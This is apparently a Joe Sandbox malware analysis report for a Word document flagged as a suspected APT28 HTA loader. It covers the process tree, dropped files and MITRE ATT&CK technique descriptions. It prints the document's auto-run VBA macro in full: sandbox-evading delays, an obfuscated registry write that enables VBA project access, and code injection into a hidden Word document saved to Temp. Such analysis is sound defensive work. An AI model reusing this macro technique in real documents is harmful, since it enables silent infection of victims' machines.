Commandline:	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x7ff7e8c00000
File size:	1'637'952 bytes
MD5 hash:	A9F0EC89897AC6C878D217DFB64CA752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:38:17
Start date:	13/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale
Imagebase:	0x7ff721570000
File size:	32'768 bytes
MD5 hash:	36D15DDE6D71802D9588CC0D48EDF8EA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: 0000000C.00000002.2753550030.00000293CD650000.00000004.00000800.00020000.00000000.sdmp, Author: Sekoia.io
Reputation:	moderate
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True
9	Public objApp, wsl

Executed Functions

Subroutine
documeNt_opEnAPIs: 37, Strings: 6, Number of lines: 29, Relevance: 94.029

APIs	Meta Information
Unprotect
Shapes
ActiveDocument
Panes
Delete
Save
Now
Now
TimeValue
DoEvents
Now
TimeValue
Part of subcall function verydanger@ThisDocument: CreateObject
Part of subcall function verydanger@ThisDocument: RegWrite
Part of subcall function verydanger@ThisDocument: Version
Part of subcall function verydanger@ThisDocument: Application
CreateObject	CreateObject("Word.Application") -> Microsoft Word
Visible
Documents
Variables
ActiveDocument
Add
Name
AddFromString
vbCrLf
Part of subcall function danger@ThisDocument: Item
ExpandEnvironmentStrings	IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Hanzo\AppData\Local\Temp
SaveAs2
Name
ActiveDocument
Close
Part of subcall function rundoc@ThisDocument: Open
Part of subcall function rundoc@ThisDocument: Save
Part of subcall function rundoc@ThisDocument: Close
Name
ActiveDocument
Quit

Strings	Decrypted Strings
"oikmseM#*inmowefj8349an3"
"00:00:15"
"Word.Application"
"Sub goods() : : End Sub"
"ThisDocument"
"%localapp""data%\T""emp"

Line	Instruction	Meta Information
24	Sub documeNt_opEn()
25	On Error Resume Next	executed
26	ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")	Unprotect
27	For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step - 1	Shapes ActiveDocument Panes
28	ActiveDocument.Shapes(i).Delete	Delete
29	Next i	Shapes ActiveDocument Panes
30	ActiveDocument.Save	Save
31	sss = Now()	Now
32	While Now < sss + TimeValue("00:00:20")	Now TimeValue
33	DoEvents	DoEvents
34	Wend	Now TimeValue
35	If Now() - sss < TimeValue("00:00:15") Then	Now TimeValue
35	Exit Sub
35	Endif
36	verydanger
37	Set objApp = CreateObject("Word.Application")	CreateObject("Word.Application") -> Microsoft Word executed
38	objApp.Visible = False	Visible
39	Set doc = objApp.Documents.Add	Documents
40	For Each vars in ActiveDocument.Variables	Variables ActiveDocument
41	doc.Variables.Add vars.Name & "ergegdr", vars	Add Name
42	i = i + 1
43	Next	Variables ActiveDocument
44	doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()	AddFromString vbCrLf
45	tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")	IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Hanzo\AppData\Local\Temp executed
46	doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13	SaveAs2 Name ActiveDocument
47	doc.Close	Close
48	rundoc (tmp & "\" & ActiveDocument.Name & ".doc")	Name ActiveDocument
49	objApp.Quit False	Quit
50	End Sub

Function
rundocAPIs: 3, Strings: 0, Number of lines: 5, Relevance: 10.505

APIs	Meta Information
Open	Documents.Open("C:\Users\Hanzo\AppData\Local\Temp\40#U0433.doc.doc")
Save
Close

Line	Instruction	Meta Information
13	Function rundoc(namedoc)
14	Set doc2 = objApp.Documents.Open(namedoc)	Documents.Open("C:\Users\Hanzo\AppData\Local\Temp\40#U0433.doc.doc") executed
15	doc2.Save	Save
16	doc2.Close	Close
17	End Function

Subroutine
verydangerAPIs: 4, Strings: 3, Number of lines: 6, Relevance: 14.006

APIs	Meta Information
CreateObject	CreateObject("WScript.Shell")
RegWrite
Version
Application

Strings	Decrypted Strings
"WSc""ript.She"
"HK""CU\Softw""are\Micr""osoft\Of""fice\"
"REG_D""WORD"

Line	Instruction	Meta Information
18	Sub verydanger()
19	strng = "WSc" & "ript.She"	executed
20	strng = strng & "ll"
21	Set wsl = CreateObject(strng)	CreateObject("WScript.Shell") executed
22	wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"	RegWrite Version Application
23	End Sub

Function
dangerAPIs: 1, Strings: 1, Number of lines: 3, Relevance: 3.003

APIs	Meta Information
Item

Strings	Decrypted Strings
"s2"

Line	Instruction	Meta Information
10	Function danger()
11	danger = ActiveDocument.Variables.Item("s2")	Item executed
12	End Function

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 40#U0433.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Settings\locale

C:\Users\user\AppData\Local\Temp\3E571842.tmp

C:\Users\user\AppData\Local\Temp\40#U0433.doc.doc (copy)

C:\Users\user\AppData\Local\Temp\45449F77.tmp

C:\Users\user\AppData\Local\Temp\msoF338.tmp

C:\Users\user\AppData\Local\Temp\~$#U0433.doc.doc

C:\Users\user\AppData\Local\Temp\~WRD0000.tmp

C:\Users\user\AppData\Local\Temp\~WRD0001.tmp

C:\Users\user\AppData\Local\Temp\~WRL0002.tmp (copy)

C:\Users\user\Desktop\40#U0433.doc (copy)

C:\Users\user\Desktop\~$#U0433.doc

C:\Users\user\Desktop\~WRD0000.tmp

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

C:\Users\user\Desktop\~WRD0002.tmp

C:\Users\user\Desktop\~WRD0002.tmp:Zone.Identifier

C:\Users\user\Desktop\~WRL0003.tmp (copy)

Static File Info

General

File Icon

Static OLE Info

General

OLE File "40#U0433.doc"

Indicators

Summary

Document Summary

Windows Analysis Report
40#U0433.doc

Subroutine
documeNt_opEnAPIs: 37, Strings: 6, Number of lines: 29, Relevance: 94.029

Function
rundocAPIs: 3, Strings: 0, Number of lines: 5, Relevance: 10.505

Subroutine
verydangerAPIs: 4, Strings: 3, Number of lines: 6, Relevance: 14.006

Function
dangerAPIs: 1, Strings: 1, Number of lines: 3, Relevance: 3.003